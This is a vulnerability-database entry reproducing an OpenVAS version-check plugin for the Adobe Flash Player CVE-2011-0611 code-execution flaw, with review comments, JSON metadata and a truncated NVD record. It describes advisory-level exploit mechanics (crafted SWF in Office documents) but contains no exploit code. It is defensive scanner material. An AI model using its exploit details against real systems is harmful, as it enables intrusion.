Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)
2011-04-22T00:00:00
ID OPENVAS:801922 Type openvas Reporter Copyright (c) 2011 Greenbone Networks GmbH Modified 2017-02-25T00:00:00
Description
This host has Adobe Flash Player installed and is prone to a code
execution vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_adobe_flash_player_code_execution_vuln_apr11_lin.nasl 5424 2017-02-25 16:52:36Z teissa $
#
# Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Report texts that the description block registers through script_tag().
# They are runtime strings shown in scan results, so the wording is left
# exactly as shipped.

# Impact text.
# NOTE(review): SUSE-SA:2011:018 describes the same CVE as code execution
# "with the privileges of the user viewing these files"; "elevated privileges"
# below may overstate the impact - confirm against the vendor advisory.
tag_impact = "Successful exploitation will let attackers to corrupt memory
and execute arbitrary code on the system with elevated privileges.
Impact Level: System/Application";
# Affected range; matches the threshold used by the version check in this script.
# NOTE(review): the NVD entry for CVE-2011-0611 gives "before 10.2.154.27" for
# Linux and tag_solution names 10.2.159.1 as the fixed release, so builds
# between 10.2.153.1 and the fix fall outside this wording - confirm which
# builds were actually shipped for Linux.
tag_affected = "Adobe Flash Player version 10.2.153.1 and prior on Linux";
# Root-cause summary: crafted SWF content leading to code execution or DoS.
tag_insight = "The flaw is due to an error in handling 'SWF' file in adobe flash
player, which allows attackers to execute arbitrary code or cause a denial
of service via crafted flash content.";
# Remediation text. The Reader/Acrobat line is advice only: this script
# compares the Flash Player version and does not inspect Reader or Acrobat.
tag_solution = "Upgrade adobe flash player to version 10.2.159.1 or later,
Update Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later,
For updates refer to http://www.adobe.com";
# One-line summary shown with the finding.
tag_summary = "This host has Adobe flash Player installed, and is prone to code
execution vulnerability.";
# Registration pass: when `description` is set, only the metadata below is
# recorded and the script exits before the version check is reached.
if(description)
{
  # Plugin identity and revision bookkeeping.
  script_id(801922);
  script_version("$Revision: 5424 $");
  script_tag(name:"last_modification", value:"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $");
  script_tag(name:"creation_date", value:"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)");

  # Vulnerability identifiers and CVSS v2 scoring (network vector, medium
  # access complexity, no authentication, complete C/I/A impact).
  script_cve_id("CVE-2011-0611");
  script_bugtraq_id(47314);
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_name("Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)");

  # Advisory references.
  script_xref(name:"URL", value:"https://www.kb.cert.org/vuls/id/230057");
  script_xref(name:"URL", value:"http://www.adobe.com/support/security/advisories/apsa11-02.html");
  script_xref(name:"URL", value:"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html");

  # Information-gathering category: the check only compares a version string
  # already stored in the knowledge base.
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
  script_family("General");

  # Depends on the Linux Flash Player detection plugin and on the KB key that
  # the version check reads. Later revisions of this plugin declare the same
  # key with script_mandatory_keys().
  script_dependencies("gb_adobe_flash_player_detect_lin.nasl");
  script_require_keys("AdobeFlashPlayer/Linux/Ver");

  # Report texts defined at the top of the script.
  script_tag(name:"impact", value:tag_impact);
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);

  # The finding rests on the reported executable version, not on probing the
  # flaw itself; remediation is a vendor-supplied fix.
  script_tag(name:"qod_type", value:"executable_version");
  script_tag(name:"solution_type", value:"VendorFix");
  exit(0);
}
include("version_func.inc");

# Version check: read the Flash Player version from the knowledge base
# (presumably stored by gb_adobe_flash_player_detect_lin.nasl, the declared
# dependency) and normalise comma separators to dots before comparing.
flashVer = get_kb_item("AdobeFlashPlayer/Linux/Ver");
flashVer = ereg_replace(pattern:",", string:flashVer, replace:".");

# Nothing to compare when no version is available.
if(!flashVer)
  exit(0);

# NOTE(review): the threshold flags 10.2.153.1 and older only. tag_solution
# names 10.2.159.1 as the fixed release and the NVD text for CVE-2011-0611
# says "before 10.2.154.27", so a host reporting a build in between is not
# flagged - confirm whether such builds exist for Linux before relying on a
# clean result.
# NOTE(review): security_message(0) reports without any text; the 2020
# revision of this plugin passes a report_fixed_ver() string so the operator
# sees the installed version and the vulnerable range.
if(version_is_less_equal(version:flashVer, test_version:"10.2.153.1"))
  security_message(0);
{"id": "OPENVAS:801922", "type": "openvas", "bulletinFamily": "scanner", "title": "Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)", "description": "This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.", "published": "2011-04-22T00:00:00", "modified": "2017-02-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=801922", "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "references": ["https://www.kb.cert.org/vuls/id/230057", "http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html", "http://www.adobe.com/support/security/advisories/apsa11-02.html"], "cvelist": ["CVE-2011-0611"], "lastseen": "2017-07-02T21:13:41", "viewCount": 2, "enchantments": {"score": {"value": 9.9, "vector": "NONE", "modified": "2017-07-02T21:13:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0611"]}, {"type": "symantec", "idList": ["SMNTC-47314"]}, {"type": "threatpost", "idList": ["THREATPOST:E1674DBE48ED411E7EF48579A10BCF26", "THREATPOST:D88693546B31883668AC9C41021BDA5B", "THREATPOST:66AAE48AA5E53AA0EB4A9179456F65FC", "THREATPOST:CA3146FC939402FCEA258087D3508FFB", "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_FLASH10O"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070774", "OPENVAS:136141256231069593", "OPENVAS:1361412562310801921", "OPENVAS:1361412562310850162", "OPENVAS:1361412562310801922", "OPENVAS:850162", "OPENVAS:69593", "OPENVAS:70774"]}, {"type": "saint", "idList": ["SAINT:D1E10A87E683A65C65EF800D90A66751", "SAINT:75531313EF0C522E1ADBAD17BC07C016", "SAINT:37227B38CBD904922BB3BD8CB235215F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:100507"]}, {"type": "nessus", "idList": 
["FREEBSD_PKG_32B05547691311E0BDC4001B2134EF46.NASL", "SUSE_FLASH-PLAYER-7477.NASL", "FLASH_PLAYER_APSB11-07.NASL", "SUSE_11_3_FLASH-PLAYER-110415.NASL", "SUSE_11_FLASH-PLAYER-110415.NASL", "REDHAT-RHSA-2011-0451.NASL", "SUSE_11_4_FLASH-PLAYER-110415.NASL", "SUSE_11_2_FLASH-PLAYER-110415.NASL", "ADOBE_AIR_APSB11-07.NASL", "ADOBE_READER_APSA11-02.NASL"]}, {"type": "cert", "idList": ["VU:230057"]}, {"type": "freebsd", "idList": ["32B05547-6913-11E0-BDC4-001B2134EF46"]}, {"type": "seebug", "idList": ["SSV:20497", "SSV:71835", "SSV:20472"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1A046239C4FEFA2569E258EE0A65227F"]}, {"type": "exploitdb", "idList": ["EDB-ID:17175"]}, {"type": "redhat", "idList": ["RHSA-2011:0451"]}, {"type": "suse", "idList": ["SUSE-SA:2011:018"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "gentoo", "idList": ["GLSA-201110-11"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}], "modified": "2017-07-02T21:13:41", "rev": 2}, "vulnersScore": 9.9}, "pluginID": "801922", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_code_execution_vuln_apr11_lin.nasl 5424 2017-02-25 16:52:36Z teissa $\n#\n# Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to corrupt memory\nand execute arbitrary code on the system with elevated privileges.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Adobe Flash Player version 10.2.153.1 and prior on Linux\";\n\ntag_insight = \"The flaw is due to an error in handling 'SWF' file in adobe flash\nplayer, which allows attackers to execute arbitrary code or cause a denial\nof service via crafted flash content.\";\n\ntag_solution = \"Upgrade adobe flash player to version 10.2.159.1 or later,\nUpdate Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later,\nFor updates refer to http://www.adobe.com\";\n\ntag_summary = \"This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.\";\n\nif(description)\n{\n script_id(801922);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)\");\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\");\n script_xref(name : \"URL\" , value : \"https://www.kb.cert.org/vuls/id/230057\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name : \"URL\" , value : 
\"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_require_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Check for Adobe Flash Player version\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\nif(flashVer)\n{\n if(version_is_less_equal(version:flashVer, test_version:\"10.2.153.1\")){\n security_message(0);\n }\n}\n", "naslFamily": "General"}
{"cve": [{"lastseen": "2021-02-02T05:50:59", "description": "Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a \"group of included constants,\" object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.", "edition": 6, "cvss3": {}, "published": "2011-04-13T14:55:00", "title": "CVE-2011-0611", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0611"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:adobe:flash_player:8.0.42.0", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:flash_player:10.1.105.6", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.4.3", "cpe:/a:adobe:acrobat_reader:9.4.1", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:8.0.24.0", 
"cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat:10.0", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:flash_player:7.0.24.0", "cpe:/a:adobe:acrobat_reader:10.0.2", "cpe:/a:adobe:acrobat_reader:9.4.2", "cpe:/a:adobe:flash_player:7.0.67.0", "cpe:/a:adobe:flash_player:10.1.92.10", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:flash_player:10.2.152.33", "cpe:/a:adobe:flash_player:10.2.156.12", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat_reader:9.4.3", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:flash_player:7.0.1", "cpe:/a:adobe:acrobat:10.0.2", "cpe:/a:adobe:acrobat:9.4.2", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:flash_player:7.0.66.0", "cpe:/a:adobe:flash_player:8.0.39.0", "cpe:/a:adobe:acrobat:10.0.1", "cpe:/a:adobe:flash_player:10.2.152.32", "cpe:/a:adobe:flash_player:7.0.19.0", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:8.0.35.0", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:acrobat:9.4", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:flash_player:7.0.70.0", "cpe:/a:adobe:flash_player:7.1.1", "cpe:/a:adobe:flash_player:8.0.33.0", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:7.1", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:10.1.53.64", "cpe:/a:adobe:flash_player:7.0.61.0", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:flash_player:7.0.69.0", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:9.0.155.0", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:flash_player:10.1.82.76", "cpe:/a:adobe:acrobat_reader:9.4", 
"cpe:/a:adobe:flash_player:10.1.102.64", "cpe:/a:adobe:flash_player:9.125.0", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:acrobat_reader:10.0", "cpe:/a:adobe:flash_player:10.1.85.3", "cpe:/a:adobe:flash_player:9.0.277.0", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:7.2", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:8.0.34.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:10.1.92.8", "cpe:/a:adobe:flash_player:6.0.79", "cpe:/a:adobe:flash_player:7.0.73.0", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:10.1.52.15", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:10.2.152", "cpe:/a:adobe:flash_player:8.0.22.0", "cpe:/a:adobe:flash_player:8.0", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:adobe:flash_player:10.1.106.16", "cpe:/a:adobe:flash_player:7.0.53.0", "cpe:/a:adobe:flash_player:7.0.63", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:flash_player:7.0.14.0", "cpe:/a:adobe:acrobat:9.4.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat_reader:10.0.1", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:7.0.68.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:7.0.25", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:9.0.262.0", "cpe:/a:adobe:flash_player:6.0.21.0", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:9.0.283.0", "cpe:/a:adobe:flash_player:10.2.154.25", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:adobe:flash_player:7.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:flash_player:10.1.52.14.1", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat:9.3.4", 
"cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:10.2.154.13", "cpe:/a:adobe:flash_player:10.1.95.2", "cpe:/a:adobe:flash_player:9.0", "cpe:/a:adobe:flash_player:7.0.60.0", "cpe:/a:adobe:flash_player:10.1.95.1", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2011-0611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0611", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:7.0.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.70.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.262.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.73.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.105.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:10.2.152.32:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152.33:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.39.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.277.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.106.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.102.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.61.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.82.76:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.53.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.69.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.67.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:8.0.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.15:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.154.13:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.85.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.21.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.68.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.156.12:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.66.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4.2:*:*:*:*:*:*:*", 
